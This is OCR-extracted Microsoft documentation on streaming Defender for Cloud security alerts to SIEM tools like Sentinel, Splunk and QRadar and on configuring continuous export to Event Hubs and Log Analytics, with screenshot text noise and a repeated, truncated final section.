Service Management solution 


Article e 03/08/2023 


Microsoft Defender for Cloud can stream your security alerts into the most popular 
Security Information and Event Management (SIEM), Security Orchestration Automated 
Response (SOAR), and IT Service Management (ITSM) solutions. Security alerts are 
notifications that Defender for Cloud generates when it detects threats on your 
resources. Defender for Cloud prioritizes and lists the alerts, along with the information 
needed for you to quickly investigate the problem. Defender for Cloud also provides 
detailed steps to help you remediate attacks. Alerts data is retained for 90 days. 


There are built-in Azure tools for ensuring you can view your alert data in all of the most 
popular solutions in use today, including: 


e Microsoft Sentinel 

e Splunk Enterprise and Splunk Cloud 
e IBM's QRadar 

e ServiceNow 

e ArcSight 

e Power BI 

e Palo Alto Networks 


Stream alerts to Microsoft Sentinel 


Defender for Cloud natively integrates with Microsoft Sentinel, Azure's cloud-native 
SIEM and SOAR solution. 


Learn more about Microsoft Sentinel. 


Microsoft Sentinel's connectors for Defender for Cloud 


Microsoft Sentinel includes built-in connectors for Microsoft Defender for Cloud at the 


subscription and tenant levels: 


e Stream alerts to Microsoft Sentinel at the subscription level 
e Connect all subscriptions in your tenant to Microsoft Sentinel Z 


When you connect Defender for Cloud to Microsoft Sentinel, the status of Defender for 
Cloud alerts that get ingested into Microsoft Sentinel is synchronized between the two 


services. So, for example, when an alert is closed in Defender for Cloud, that alert is also 
shown as closed in Microsoft Sentinel. If you change the status of an alert in Defender 
for Cloud, the status of the alert in Microsoft Sentinel is also updated, but the statuses 
of any Microsoft Sentinel incidents that contain the synchronized Microsoft Sentinel 
alert aren't updated. 


You can enable the bi-directional alert synchronization feature to automatically sync 
the status of the original Defender for Cloud alerts with Microsoft Sentinel incidents that 
contain the copies of those Defender for Cloud alerts. So, for example, when a Microsoft 
Sentinel incident that contains a Defender for Cloud alert is closed, Defender for Cloud 
automatically closes the corresponding original alert. 


Learn more in Connect alerts from Microsoft Defender for Cloud. 


O Note 


The bi-directional alert synchronization feature isn't available in the Azure 


Government cloud. 


Configure ingestion of all audit logs into Microsoft 
Sentinel 


Another alternative for investigating Defender for Cloud alerts in Microsoft Sentinel is to 


stream your audit logs into Microsoft Sentinel: 


e Connect Windows security events 
e Collect data from Linux-based sources using Syslog 
e Connect data from Azure Activity log 


Q Tip 


Microsoft Sentinel is billed based on the volume of data that it ingests for analysis 
in Microsoft Sentinel and stores in the Azure Monitor Log Analytics workspace. 
Microsoft Sentinel offers a flexible and predictable pricing model. Learn more at 
the Microsoft Sentinel pricing page Z. 


Stream alerts to QRadar and Splunk 


The export of security alerts to Solunk and QRadar uses Event Hubs and a built-in 
connector. You can either use a PowerShell script or the Azure portal to set up the 


requirements for exporting security alerts for your subscription or tenant. Then you'll 


need to use the procedure specific to each SIEM to install the solution in the SIEM 


platform. 


Prerequisites 


Before you set up the Azure services for exporting alerts, make sure you have: 


e Azure subscription (Create a free account “) 


e Azure resource group (Create a resource group) 


e Owner role on the alerts scope (subscription, management group or tenant), or 


these specific permissions: 


o Write permissions for event hubs and the Event Hub Policy 


o Create permissions for Azure AD applications, if you aren't using an existing 


Azure AD application 


o Assign permissions for policies, if you're using the Azure Policy 


‘DeploylfNotExist' 


Step 1. 


Set up the Azure services 


You can set up your Azure environment to support continuous export using either: 


e A PowerShell script (Recommended) 


Download and run the PowerShell script’. Enter the required parameters and the 
script performs all of the steps for you. When the script finishes, it outputs the 


information you'll use to install the solution in the SIEM platform. 


e The Azure portal 


Here's an overview of the steps you'll do in the Azure portal: 


1. 
2. 


Create an Event Hubs namespace and event hub. 
Define a policy for the event hub with “Send” permissions. 


3. If you're streaming alerts to QRadar - Create an event hub "Listen" policy, 


then copy and save the connection string of the policy that you'll use in 
QRadar. 


. Create a consumer group, then copy and save the name that you'll use in the 


SIEM platform. 


. Enable continuous export of security alerts to the defined event hub. 
. If you're streaming alerts to QRadar - Create a storage account, then copy 


and save the connection string to the account that you'll use in QRadar. 


. If you're streaming alerts to Splunk: 


a. Create an Azure Active Directory (AD) application. 

b. Save the Tenant, App ID, and App password. 

c. Give permissions to the Azure AD Application to read from the event hub 
you created before. 


For more detailed instructions, see Prepare Azure resources for exporting to 
Splunk and QRadar. 


Step 2. Connect the event hub to your preferred solution 


using the built-in connectors 


Each SIEM platform has a tool to enable it to receive alerts from Azure Event Hubs. 
Install the tool for your platform to start receiving alerts. 


Tool Hosted Description 
in 
Azure 
IBM No The Microsoft Azure DSM and Microsoft Azure Event Hubs Protocol are 
QRadar available for download from the IBM support website E, 
Splunk No Splunk Add-on for Microsoft Cloud Services is an open source project 


available in Splunkbase. 


If you can't install an add-on in your Splunk instance, for example if you're 
using a proxy or running on Splunk Cloud, you can forward these events to 
the Splunk HTTP Event Collector using Azure Function For Splunk £, which is 
triggered by new messages in the event hub. 


Stream alerts with continuous export 


To stream alerts into ArcSight, SumoLogic, Syslog servers, LogRhythm, Logz.io Cloud 
Observability Platform, and other monitoring solutions, connect Defender for Cloud 
using continuous export and Azure Event Hubs: 


O Note 


To stream alerts at the tenant level, use this Azure policy and set the scope at the 
root management group. You'll need permissions for the root management group 
as explained in Defender for Cloud permissions: Deploy export to an event hub 
for Microsoft Defender for Cloud alerts and recommendations Z . 


1. Enable continuous export to stream Defender for Cloud alerts into a dedicated 
event hub at the subscription level. To do this at the Management Group level 
using Azure Policy, see Create continuous export automation configurations at 


scale. 


2. Connect the event hub to your preferred solution using the built-in connectors: 


Tool Hosted Description 
in 
Azure 
SumoLogic No Instructions for setting up SumoLogic to consume data from an 


event hub are available at Collect Logs for the Azure Audit App 
from Event Hubs Z.. 


ArcSight No The ArcSight Azure Event Hubs smart connector is available as part 
of the ArcSight smart connector collection”. 


Syslog No If you want to stream Azure Monitor data directly to a syslog 
server server, you can use a solution based on an Azure function £ . 
LogRhythm No Instructions to set up LogRhythm to collect logs from an event hub 


are available here Z. 


Logz.io Yes For more information, see Getting started with monitoring and 
logging using Logz.io for Java apps running on Azure 


3. Optionally, stream the raw logs to the event hub and connect to your preferred 
solution. Learn more in Monitoring data available. 


To view the event schemas of the exported data types, visit the Event Hubs event 


schemas“. 


Use the Microsoft Graph Security API to stream 
alerts to third-party applications 


As an alternative to Microsoft Sentinel and Azure Monitor, you can use Defender for 
Cloud's built-in integration with Microsoft Graph Security API £. No configuration is 
required. 


You can use this API to stream alerts from your entire tenant (and data from many 
Microsoft Security products) into third-party SIEMs and other popular platforms: 


e Splunk Enterprise and Splunk Cloud - Use the Microsoft Graph Security API Add- 
On for Splunk £ 


e Power BI - Connect to the Microsoft Graph Security API in Power BI Desktop. 

e ServiceNow - Install and configure the Microsoft Graph Security API application 
from the ServiceNow Store”. 

e QRadar - Use IBM's Device Support Module for Microsoft Defender for Cloud via 
Microsoft Graph ARIS. 

e Palo Alto Networks, Anomali, Lookout, InSpark, and more - Use the Microsoft 
Graph Security API Z. 


Next steps 


This page explained how to ensure your Microsoft Defender for Cloud alert data is 
available in your SIEM, SOAR, or ITSM tool of choice. For related material, see: 


e What is Microsoft Sentinel? 

e Alert validation in Microsoft Defender for Cloud - Verify your alerts are correctly 
configured 

e Continuously export Defender for Cloud data 


Prepare Azure resources for exporting 
to Splunk and QRadar 


Article e 10/11/2023 


In order to stream Microsoft Defender for Cloud security alerts to IBM QRadar and 
Splunk, you have to set up resources in Azure, such as Event Hubs and Microsoft Entra 
ID. Here are the instructions for configuring these resources in the Azure portal, but you 
can also configure them using a PowerShell script. Make sure you review Stream alerts 
to QRadar and Splunk before you configure the Azure resources for exporting alerts to 
QRadar and Splunk. 


To configure the Azure resources for QRadar and Splunk in the Azure portal: 


Step 1: Create an Event Hubs namespace and 
event hub with send permissions 


1. In the Event Hubs service, create an Event Hubs namespace: 
a. Select Create. 
b. Enter the details of the namespace, select Review + create, and select Create. 


Home > Event Hubs 


== Create Namespace 
TT Event Hubs 


Basics Networking Tags Review + create 


Project Details 


source group * | 
ate ne! 

Instance Details 

Enter required settings for this namespace, including a price tier and configuring the number of units (capacity 


ames m 
servicebus.windows.net 
ation 
e erten hi 
Pricing tier * 
Browse the available plans and their features 

Throughput Units * | © aak 1 

[ Nent Networking >] gei 


2. Create an event hub: 
a. In the namespace that you create, select + Event Hub. 
b. Enter the details of the event hub, and select Review + create, and select 
Create. 


3. Create a shared access policy. 
a. In the Event Hub menu, select the Event Hubs namespace you created. 
b. In the Event Hub namespace menu, select Event Hubs. 
c. Select the event hub that you just created. 
d. In the event hub menu, select Shared access policies. 
e. Select Add, enter a unique policy name, and select Send. 


f. Select Create to create the policy. 


Home > alertstootherSIEM > alertstootherSIEM Add SAS Policy 
? alertstootherSIEM | Shared access policies + er 


Event Hubs Namespace | @ Directory: Micro 
P Search (Ctrl | + Add 
=. Overview Search to filter items 
E Activity log Policy Claims 
E Access control (IAM) RootManageSharedAccessKey Manage, Send, Listen 
@ Tags 


& Diagnose and solve problems 


$ Events 


Entities 

E Event Hubs 
Monitoring 

PE Alerts 

d Metrics 

E Diagnostic settings 
P Logs 

Automation 

alk Tasks (preview) 
| Export template 
Support + troubleshooting 


EE Resource health 


E New Support Request Q 


Step 2: For streaming to QRadar SIEM - Create 
a Listen policy 

1. Select Add, enter a unique policy name, and select Listen. 

2. Select Create to create the policy. 


3. After the listen policy is created, copy the Connection string primary key and save 
it to use later. 


Home > Event Hubs > alertstootherSIEM 


SAS Policy: listenpolicy 
SIEM | Shared access policies * 


nt Hubs Narr @ Directory: Microsoft OO Delet 
+ Add 
age 
earch to filter items. 
Ea 
Policy Claims 
b Access control (AM RootManageSharedAccesskey Manage, Send, Listen E use 
@ Tags continuousexport Send 
a egiatarra P7pn6KCvKgavQoj4icJX9elizkbZEEKvzgxm..J © 
¢ Diagnose and solve problems listenpolicy Listen P 9 z = o) 
£ Events ey 
7B/IBinibMs75Q9zJoTspHEFBnjMLPN ò 
Settings 
ection stri 
€? Shared access policies 
d Scale 
tion string- 
E Geo-Recovery Endpoint=sb://alertstoothers 


Â Encryption 


Step 3: Create a consumer group, then copy 
and save the name to use in the SIEM platform 


1. 


2. 


In the Entities section of the Event Hubs event hub menu, select Event Hubs and 
select the event hub you created. 


Home > alertstootherSIEM 


= alertstootherSIEM | Event Hubs 
Event Hubs Namespa © Directory: ! oft 


Be a A Name Status Message Retention Partition Count 
cess control (IAM) 


Select Consumer group. 


Step 4: Enable continuous export for the scope 
of the alerts 


— 


N 


LA) 


LI 


. In the Azure search box, search for "policy" and go to the Policy. 
. In the Policy menu, select Definitions. 


. Search for "deploy export" and select the Deploy export to Event Hub for 


Microsoft Defender for Cloud data built-in policy. 


. Select Assign. 


. Define the basic policy options: 


a. In Scope, select the ... to select the scope to apply the policy to. 
b. Find the root management group (for tenant scope), management group, 
subscription, or resource group in the scope and select Select. 


e To select a tenant root management group level you need to have 


permissions on tenant level. 


c. (Optional) In Exclusions you can define specific subscriptions to exclude from 


the export. 
d. Enter an assignment name. 


e. Make sure policy enforcement is enabled. 


Home > Policy > Deploy export to Event Hub for Azure Security Center data 


Deploy export to Event Hub for Azure Security Center data 


rt to Event Hub for Azure Security Center data 


6. In the policy parameters: 


a. Enter the resource group where the automation resource is saved. 
b. Select resource group location. 


ocessing-Application) 


e 


Clear All Selections 


c. Select the ... next to the Event Hub details and enter the details for the event 


hub, including: 


e Subscription. 
e The Event Hubs namespace you created. 
e The event hub you created. 


e In authorizationrules, select the shared access policy that you created to 


send alerts. 


Home > Policy > Deploy export to Event Hub for Azure Security Center data 


Event Hub details 
Deploy export to Event Hub for Azure Security Center data 


7. Select Review and Create and Create to finish the process of defining the 
continuous export to Event Hubs. 


e Notice that when you activate continuous export policy on the tenant (root 
management group level), it automatically streams your alerts on any new 
subscription that will be created under this tenant. 


Step 5: For streaming alerts to QRadar SIEM - 
Create a storage account 


1. Go to the Azure portal, select Create a resource, and select Storage account. If 
that option isn't shown, search for "storage account". 


2. Select Create. 


3. Enter the details for the storage account, select Review and Create, and then 
Create. 
aa EO account 


Project details 


4. After you create your storage account and go to the resource, in the menu select 
Access Keys. 


5. Select Show keys to see the keys, and copy the connection string of Key 1. 


Home > exporttocthersiem_1649246906691 
? exporttoothersiem | Access keys =+ 
o 


heyi 


Step 6: For streaming alerts to Splunk SIEM - 
Create a Microsoft Entra application 


1. In the menu search box, search for "Microsoft Entra ID" and go to Microsoft Entra 
ID. 


2. Go to the Azure portal, select Create a resource, and select Microsoft Entra ID. If 
that option isn't shown, search for "active directory". 


3. In the menu, select App registrations. 

4. Select New registration. 

5. Enter a unique name for the application and select Register. 
Register an application 


Q 


6. Copy to Clipboard and save the Application (client) ID and Directory (tenant) ID. 


7. Create the client secret for the application: 


a. In the menu, go to Certificates & secrets. 

b. Create a password for the application to prove its identity when requesting a 
token: 

c. Select New client secret. 

d. Enter a short description, choose the expiration time of the secret, and select 
Add. 


meee eee ere Add a client secret 
? exporttosiem | Certificates & secrets 


A 


8. After the secret is created, copy the Secret ID and save it for later use together with 
the Application ID and Directory (tenant) ID. 


Step 7: For streaming alerts to Splunk SIEM - 
Allow Microsoft Entra ID to read from the event 
hub 


1. Go to the Event Hubs namespace you created. 
2. In the menu, go to Access control. 
3. Select Add and select Add role assignment. 


4. Select Add role assignment. 


jertstootheSIEM 


ome > Event Hubs > a 
Ro alertstootherSIEM | Access control (IAM) 
D 


r PME EF 


5. In the Roles tab, search for Azure Event Hubs Data Receiver. 

6. Select Next. 

7. Select Select Members. 

8. Search for the Microsoft Entra application you created before and select it. 
9. Select Close. 


To continue setting up export of alerts, install the built-in connectors for the SIEM you're 


using. 


Continuously export Microsoft Defender 
for Cloud data 


Article e 07/10/2023 


Microsoft Defender for Cloud generates detailed security alerts and recommendations. 
To analyze the information in these alerts and recommendations, you can export them 
to Azure Log Analytics, Event Hubs, or to another SIEM, SOAR, or IT classic deployment 
model solution. You can stream the alerts and recommendations as they're generated or 
define a schedule to send periodic snapshots of all of the new data. 


With continuous export, you can fully customize what information to export and where 
it goes. For example, you can configure it so that: 


e All high severity alerts are sent to an Azure event hub 

e All medium or higher severity findings from vulnerability assessment scans of your 
SQL servers are sent to a specific Log Analytics workspace 

e Specific recommendations are delivered to an event hub or Log Analytics 
workspace whenever they're generated 

e The secure score for a subscription is sent to a Log Analytics workspace whenever 
the score for a control changes by 0.01 or more 


This article describes how to configure continuous export to Log Analytics workspaces 


or Azure event hubs. 


Q Tip 


Defender for Cloud also offers the option to perform a one-time, manual export to 


CSV. Learn more in Manual one-time export of alerts and recommendations. 


Availability 


Aspect Details 

Release state: General availability (GA) 

Pricing: Free 

Required roles e Security admin or Owner on the resource group 

and e Write permissions for the target resource. 

permissions: e If you're using the Azure Policy 'DeploylfNotExist’ policies, you need the 


permissions that allow you to assign policies 


Aspect Details 


e To export data to Event Hubs, you need Write permission on the Event 
Hubs Policy. 
e To export to a Log Analytics workspace: 
o if it has the SecurityCenterFree solution, you need a minimum of 
read permissions for the workspace solution: 
Microsoft .OperationsManagement/solutions/read 
o if it doesn't have the SecurityCenterFree solution, you need write 
permissions for the workspace solution: 
Microsoft .OperationsManagement/solutions/action 
o Learn more about Azure Monitor and Log Analytics workspace 
solutions 


Clouds: © Commercial clouds 
© National (Azure Government, Azure China 21Vianet) 


What data types can be exported? 


Continuous export can export the following data types whenever they change: 


e Security alerts. 

e Security recommendations. 

e Security findings. Findings can be thought of as ‘sub’ recommendations and 
belong to a 'parent' recommendation. For example: 

o The recommendations System updates should be installed on your machines 
(powered by Update Center)“ and System updates should be installed on your 
machines? each has one 'sub' recommendation per outstanding system 
update. 

o The recommendation Machines should have vulnerability findings resolved £ 
has a 'sub' recommendation for every vulnerability identified by the vulnerability 
scanner. 


O Note 


If you're configuring a continuous export with the REST API, always include 
the parent with the findings. 


e Secure score per subscription or per control. 
e Regulatory compliance data. 


Set up a continuous export 


You can configure continuous export from the Microsoft Defender for Cloud pages in 
Azure portal, via the REST API, or at scale using the supplied Azure Policy templates. 


Use the Azure portal 


Configure continuous export from the Defender for 
Cloud pages in Azure portal 


If you're setting up a continuous export to Log Analytics or Azure Event Hubs: 
1. From Defender for Cloud's menu, open Environment settings. 


2. Select the specific subscription for which you want to configure the data 
export. 


3. From the sidebar of the settings page for that subscription, select Continuous 


export. 


Settings | Continuous export 


Contoso Hotels Tenant - Production 


[e Search (Ctrl+/) 


Settings 

F Defender plans 

~ Auto provisioning 

@ Email notifications 
GO Integrations 

ZA Workflow automation 
Policy settings 

©: Security policy 


© Governance rules (preview) 


[a=] 


A You have limited permissions to the export target subscription, this may affect the accuracy of the data showing below. 


= Continuous export 


Configure streaming export setting of Defender for Cloud data to multiple export targets. 
Exporting Defender for Cloud's data also enables you to use experiences such as integration with 3rd-party SIEM and Azure Data Explorer. 


Learn More > 


Event hub Log Analytics workspace 


Export enabled K on J ) 


Exported data types 
E Security recommendations 
Recommendation severity * 
Include security findings © 
@ Secure score @ 
Controls 


E Security alerts 


@ Regulatory compliance 


Export frequency 


E streaming updates © 


@ Snapshots (Preview) © 


ECunart erti ean rrien 


The resource group where this export configuration will reside 


Resource group * © 


Export target 
Subscription * 

Event Hub namespace * 
Event Hub name * 


Event hub policy name * 


All recommendations selected Vv 


Low,Medium,High VY 


Overall score,Control score s 
All controls selected M 
Low,Medium,High,Informational Vv 
All standards selected KA 


Select resource group W 


Contoso Hotels Tenant - Production V 


Select Event Hub namespace V 


Select Event Hub W | QA 


Select Event Hub policy name V 


Here you see the export options. There's a tab for each available export target, 
either event hub or Log Analytics workspace. 


4. Select the data type you'd like to export and choose from the filters on each 
type (for example, export only high severity alerts). 


5. Select the export frequency: 


e Streaming — assessments are sent when a resource’s health state is 
updated (if no updates occur, no data is sent). 

e Snapshots — a snapshot of the current state of the selected data types 
that are sent once a week per subscription. To identify snapshot data, 
look for the field IsSnapshot . 


If your selection includes one of these recommendations, you can include the 
vulnerability assessment findings together with them: 


e SQL databases should have vulnerability findings resolved Z 

e SQL servers on machines should have vulnerability findings resolved Z 

e Container registry images should have vulnerability findings resolved 
(powered by Qualys) £ 

e Machines should have vulnerability findings resolved £ 

e System updates should be installed on your machines E 


To include the findings with these recommendations, enable the include 
security findings option. 


Settings | Continuous export 


Contoso 


P Search (Ctrl+/) | « 


Settings 


©) Pricing tier E Continuous export 


© Data Collection 
Configure streaming export setting of Security alerts and recommendations to multiple export targets, 

@ Email notifications Exporting Microsoft Defender for Cloud's data also enables you to use experiences such as integration with 3rd-party SIEM and Azure Data Explorer. 
Learn More > 

© Threat detection 


ZA Workflow automation Event hub Log Analytics workspace 


E Continuous export ————— 
Export enabled On off J 


Exported data types 


E security recommendations All recommendations sele.. V 


Recommendation severity No selected severities M 


Include security findings ( | Dv 


6. From the "Export target" area, choose where you'd like the data saved. Data 
can be saved in a target of a different subscription (for example, on a Central 
Event Hubs instance or a central Log Analytics workspace). 


You can also send the data to an Event hubs or Log Analytics workspace ina 
different tenant. 


7. Select Save. 


O Note 


Log analytics supports records that are only up to 32KB in size. When the data 
limit is reached, you will see an alert telling you that the Data limit has been 


exceeded. 


Exporting to a Log Analytics workspace 


If you want to analyze Microsoft Defender for Cloud data inside a Log Analytics 
workspace or use Azure alerts together with Defender for Cloud alerts, set up 
continuous export to your Log Analytics workspace. 


Log Analytics tables and schemas 


Security alerts and recommendations are stored in the SecurityAlert and 
SecurityRecommendation tables respectively. 


The name of the Log Analytics solution containing these tables depends on whether 
you've enabled the enhanced security features: Security (‘Security and Audit’) or 


SecurityCenterFree. 


Q Tip 


To see the data on the destination workspace, you must enable one of these 


solutions Security and Audit or SecurityCenterFree. 


Active 

v É) Ins 
>» ChangeTracking 
> Containerlnsights 


> Containers 


v 


LogManagement 
v Security 
> H CommonSecurityLog 
> E LinuxAuditLog 
> H ProtectionStatus 
> E SecurityAlert 
> H SecurityBaseline b 


To view the event schemas of the exported data types, visit the Log Analytics table 


schemas Z . 


Export data to an Azure Event Hubs or Log 
Analytics workspace in another tenant 


You cannot configure data to be exported to a log analytics workspace in another 
tenant when using Azure Policy to assign the configuration. This process only works with 
the REST API, and the configuration is unsupported in the Azure portal (due to requiring 


multitenant context). Azure Lighthouse does not resolve this issue with Policy, although 
you can use Lighthouse as the authentication method. 


When collecting data into a tenant, you can analyze the data from one central location. 
To export data to an Azure Event Hubs or Log Analytics workspace in a different tenant: 


1. In the tenant that has the Azure Event Hubs or Log Analytics workspace, invite a 
user from the tenant that hosts the continuous export configuration, or 
alternatively configure Azure Lighthouse for the source and destination tenant. 

2. If using Azure AD B2B Guest access, ensure that the user accepts the invitation to 
access the tenant as a guest. 

3. If you're using a Log Analytics Workspace, assign the user in the workspace tenant 
one of these roles: Owner, Contributor, Log Analytics Contributor, Sentinel 
Contributor, or Monitoring Contributor. 

4. Create and submit the request to the Azure REST API to configure the required 
resources. You'll need to manage the bearer tokens in both the context of the local 
(workspace) and the remote (continuous export) tenant. 


Continuously export to an event hub behind a 
firewall 


You can enable continuous export as a trusted service, so that you can send data to an 
event hub that has an Azure Firewall enabled. 


To grant access to continuous export as a trusted service: 
1. Sign in to the Azure portal £. 
2. Navigate to Microsoft Defender for Cloud > Environmental settings. 
3. Select the relevant resource. 
4. Select Continuous export. 


5. Select Export as a trusted service. 


Home > Settings 


Settings | Continuous export 


N/A 


| Ø Search 


Settings 


Defender plans Export frequency 
@ Email notifications 
Ta Workflow automation E pazia reg 
GO Integrations Snapshots (Preview) © 
Continuous export 
Policy settings € 

Export configuration 

*: Security policy 


© Governance rules (preview) Resource group * © Select resource group Y 


Export target 


Subscription * MDC-EEE-Playground 
Event Hub namespace * Select Event Hub namespace W 
Event Hub name * Select Event Hub V 


Event hub policy name 


@ Saving data to event hub incurs ingestion charges, as detailed here> 


O No Event Hubs namespaces found. To create one click here> 


You need to add the relevant role assignment on the destination Event Hubs. 
To add the relevant role assignment on the destination Event Hub: 
1. Navigate to the selected Event Hubs. 


2. Select Access Control > Add role assignment 


Home > Event Hubs > contososiempipe-ns 


Event Hubs < Ro contososiempipe-ns | Access control (IAM) 


Microsoft (microsoft.onmicrosoft.com) Event Hubs Namespace 


+ Create GO Manage view v Er Ø Search 

| © Overview 

contoso 

Name t E Activity log 

— e 3 BQ Access control (IAM) 

=, contososiempipe-ns TZA 
o Tags 
ES Diagnose and solve problems 
g Events 
Settings 


E Shared access policies 
Ž Scale 

E Geo-Recovery 

TZ Networking 

& Encryption 

Gm Configuration 


ili Properties 


3. Select Azure Event Hubs Data Sender. 
4. Select the Members tab. 


5. Select + Select members. 


> 


+ Add Download role assignments 


O Refresh 


Check access Role assignments Roles Deny assignments Classic 


My access 


View my level of access to this resource. 


View my access 


Check access 


Review the level of access a user, group, service principal, or managed identity has t 


Grant access to this resource 


Grant access to resources by assigning a role. 


6. Search for and select Windows Azure Security Resource Provider. 


Home > Event Hubs > contososiempipe-ns | Access control (IAM) 


Add role assignment 
OY Got feedback? 


Poe Stern 


Selected role Azure Event Hubs Data Sender 


Assign access to 


User, group, or service principal 


Managed identity 


Members 
Name Object ID Type 
No members selected 

Description Optional 


Select members 


Select © 


Learn more ri 


View access 


View the role a: 
other resources 


= 


windows azure security resource provider 


| | Previous Next 


7. Select Review + assign. 


Selected members: 


No members selected. Search for and add one or more members 


you want to assign to the role for this resource. 


Learn more about RBAC 


Select Close 


View exported alerts and recommendations in 


Azure Monitor 


You might also choose to view exported Security Alerts and/or recommendations in 
Azure Monitor. 


Azure Monitor provides a unified alerting experience for various Azure alerts including 
Diagnostic Log, Metric alerts, and custom alerts based on Log Analytics workspace 
queries. 


To view alerts and recommendations from Defender for Cloud in Azure Monitor, 
configure an Alert rule based on Log Analytics queries (Log Alert): 


1. From Azure Monitor's Alerts page, select New alert rule. 


Monitor - Alerts 


Microsoft 


O Search (Cmd+/) be + Newalert rule ZG Manage alert rules Ra Manage actions ÑQ View classic alerts ©) Refresh 
Oveen i Don't see a subscription? Open Directory + Subscription settings 
g | Subscription * © Resource group © 
E Activity log | [100 selected \ | T Type to start filtering ... v 
EJ Alerts | 
AÍ Metrics | Total alerts Smart groups (Preview) © Total alert rules Action rules (preview) © 
® Logs | 639 62 329 2 
. | Since 11/25/2019, 6:16:28 PM 90.30% Reduction Enabled 246 Enabled 2 
© Service Health | 
B Workbooks 
Insights Severity Total Alerts 
GE | Sev 0 68 
E Applications | Isev d 
E Virtual Machines (preview) b Isev 2 
= . | Sev 2 54 
== Storage Accounts (preview) l id EE 
Gete Isev 3 145 
| Sev 4 20 m 


E Networks (preview) 
& Cosmos DB (preview) 


©) Key vaults (preview) 


2. In the create rule page, configure your new rule (in the same way you'd configure a 
log alert rule in Azure Monitor): 


e For Resource, select the Log Analytics workspace to which you exported 
security alerts and recommendations. 


e For Condition, select Custom log search. In the page that appears, configure 
the query, lookback period, and frequency period. In the search query, you 
can type SecurityAlert or SecurityRecommendation to query the data types 
that Defender for Cloud continuously exports to as you enable the 
Continuous export to Log Analytics feature. 


e Optionally, configure the Action Group that you'd like to trigger. Action 
groups can trigger email sending, ITSM tickets, WebHooks, and more. 


Create rule 
Rules managemen! 


| F * RESOURCE HIERARCHY 


OO contosoretail-IT ? Contoso IT -demo > [=] contosoazur 
Select 
* CONDITION Monthly cost in USD (Estimated) 
b Qo Whenever the Custom log search is Greater than 0 count $ 1.50 E 
Total $ 1.50 


@ Azure Alerts are currently limited to either 2 metric, 1 log, or 1 activity log signal per alert rule. To alert on more signals, please create additional alert rules. 


a ACTIONS 
Action group name Contain actions 
Send Email 2 Email(s) i 
Select action group Create action group 


O Action rules (preview) allows you to define actions at scale as well as suppress actions. Learn more about this functionality here 
Customize Actions 
| Email subject 
pe 
Include custom Json payload for webhook 


ALERT DETAILS 


Alert rule name * 


MicrosoftDefenderforCloudAlertRule 


Description 


Alert rule for exported data from Microsoft Defender for Cloud | 


Severity * © 


Warning(Sev 1) wv 


Enable rule upon creation 


Yes No 


Suppress Alerts 


Create alert rule 


The Microsoft Defender for Cloud alerts or recommendations appears (depending on 
your configured continuous export rules and the condition you defined in your Azure 


Monitor alert rule) in Azure Monitor alerts, with automatic triggering of an action group 
(if provided). 


Manual one-time export of alerts and 
recommendations 


To download a CSV report for alerts or recommendations, open the Security alerts or 
Recommendations page and select the Download CSV report button. 


Q Tip 


Due to Azure Resource Graph limitations, the reports are limited to a file size of 13K 
rows. If you're seeing errors related to too much data being exported, try limiting 
the output by selecting a smaller set of subscriptions to be exported. 


@ Microsoft Defender for Cloud | Security alerts 


Showing subscription ‘ASC DEMO" 


*& Suppression rules 8 Security alerts map O Sample alerts 


» ©) Refresh $ Change status ~ TE Open query 
Active alerts Affected resources 
| Æ Search by ID, title, or affected resource Subscription == All 


E Severity d Alert title Ty 


High Ọ Microsoft Defender for Cloud test... 


High @ Exposed Kubernetes dashboard d... 


High DU Exposed Kubernetes dashboard d... 


High @ Unusual amou... Sample alert 


| High @ Access froma... Sample alert 


High @ Exposed Kubernetes dashboard d... 


© Note 


Affected resource Ty 

48 ASC-AKS-CLOUD-TALK 
ZO ASC-AKS-CLOUD-TALK 
$% ASC-IGNITE-DEMO 

= Sample-Storage 

= Sample-Storage 


$% ASC-IGNITE-DEMO 


Status == Active X 


Activity start time (UTC+2) Ty MITRE ATT&CK® tactics 


02/01/21, 05:04 PM 


01/28/21, 04:51 PM 


01/26/21, 11:04 AM 


01/25/21, 11:13 AM 


01/25/21, 11:13 AM 


01/11/21, 03:47 PM 


Severity == All X 


bo Add filter 


C) Persistence 
ZE initial Access 
E initial Access 
Tb Pre-attack 
y Exfiltration 


EZ initial Access 


L Download CSV report 


No grouping V 


Status Ty 


Active 


Active 


Active 


Active 


Active 


Active 


These reports contain alerts and recommendations for resources from the currently 


selected subscriptions. 


Next steps 


In this article, you learned how to configure continuous exports of your 


recommendations and alerts. You also learned how to download your alerts data as a 


CSV file. 


For related material, see the following documentation: 


e Learn more about workflow automation templates Z. 


e Azure Event Hubs documentation 


e Microsoft Sentinel documentation 


e Azure Monitor documentation 


e Export data types schemas E 


e Check out common questions about continuous export. 


Continuously export Microsoft Defender 
for Cloud data 


Article e 07/10/2023 


Microsoft Defender for Cloud generates detailed security alerts and recommendations. 
To analyze the information in these alerts and recommendations, you can export them 
to Azure Log Analytics, Event Hubs, or to another SIEM, SOAR, or IT classic deployment 
model solution. You can stream the alerts and recommendations as they're generated or 
define a schedule to send periodic snapshots of all of the new data. 


With continuous export, you can fully customize what information to export and where 
it goes. For example, you can configure it so that: 


e All high severity alerts are sent to an Azure event hub 

e All medium or higher severity findings from vulnerability assessment scans of your 
SQL servers are sent to a specific Log Analytics workspace 

e Specific recommendations are delivered to an event hub or Log Analytics 
workspace whenever they're generated 

e The secure score for a subscription is sent to a Log Analytics workspace whenever 
the score for a control changes by 0.01 or more 


This article describes how to configure continuous export to Log Analytics workspaces 


or Azure event hubs. 


Q Tip 


Defender for Cloud also offers the option to perform a one-time, manual export to 


CSV. Learn more in Manual one-time export of alerts and recommendations. 


Availability 


Aspect Details 

Release state: General availability (GA) 

Pricing: Free 

Required roles e Security admin or Owner on the resource group 

and e Write permissions for the target resource. 

permissions: e If you're using the Azure Policy 'DeploylfNotExist’ policies, you need the 


permissions that allow you to assign policies 


Aspect Details 


e To export data to Event Hubs, you need Write permission on the Event 
Hubs Policy. 
e To export to a Log Analytics workspace: 
o if it has the SecurityCenterFree solution, you need a minimum of 
read permissions for the workspace solution: 
Microsoft .OperationsManagement/solutions/read 
o if it doesn't have the SecurityCenterFree solution, you need write 
permissions for the workspace solution: 
Microsoft .OperationsManagement/solutions/action 
o Learn more about Azure Monitor and Log Analytics workspace 
solutions 


Clouds: © Commercial clouds 
© National (Azure Government, Azure China 21Vianet) 


What data types can be exported? 


Continuous export can export the following data types whenever they change: 


e Security alerts. 

e Security recommendations. 

e Security findings. Findings can be thought of as ‘sub’ recommendations and 
belong to a 'parent' recommendation. For example: 

o The recommendations System updates should be installed on your machines 
